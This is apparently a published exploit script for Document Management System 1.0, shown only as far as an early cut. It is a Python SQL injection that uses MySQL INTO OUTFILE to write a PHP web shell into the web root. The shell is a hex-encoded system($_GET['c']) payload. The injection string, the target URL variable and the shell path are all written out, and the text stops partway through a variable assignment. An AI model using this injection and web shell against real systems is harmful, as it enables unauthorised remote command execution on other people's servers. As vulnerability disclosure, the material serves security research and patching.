Authored by Richard Jones

Document Management System version 1.0 remote SQL injection exploit that drops a PHP web shell into the web root through MySQL `INTO OUTFILE` (so it only works when the application's database user holds the FILE privilege and the database server can write to the web root).

# Exploit Title: Document Management System - SQL Injection to RCE (webshell)
# Date: 23/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/7652/document-management-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

#!/usr/bin/python3
import requests
import sys
import urllib.parse
import time

URL=f"http://TARGET/doc_system/docsytems/" # Change URL
SAVEPATH="c:/xampp/htdocs/" #Change to webfolder root (ie: /var/www/html on unix)

HOSTNAME=urllib.parse.urlparse(f"{URL}").netloc
PHPPAYLOAD="3c3f7068702073797374656d28245f4745545b2763275d293b203f3e" #<?php system($_GET['c']);?>
PAYLOAD=f"-8087' OR 6017=6017 LIMIT 0,1 INTO OUTFILE '{SAVEPATH}xythif42taA.php' LINES TERMINATED BY 0x{PHPPAYLOAD}-- -" #Change filename if you wish, replace 'xythif42taA.php'

RS='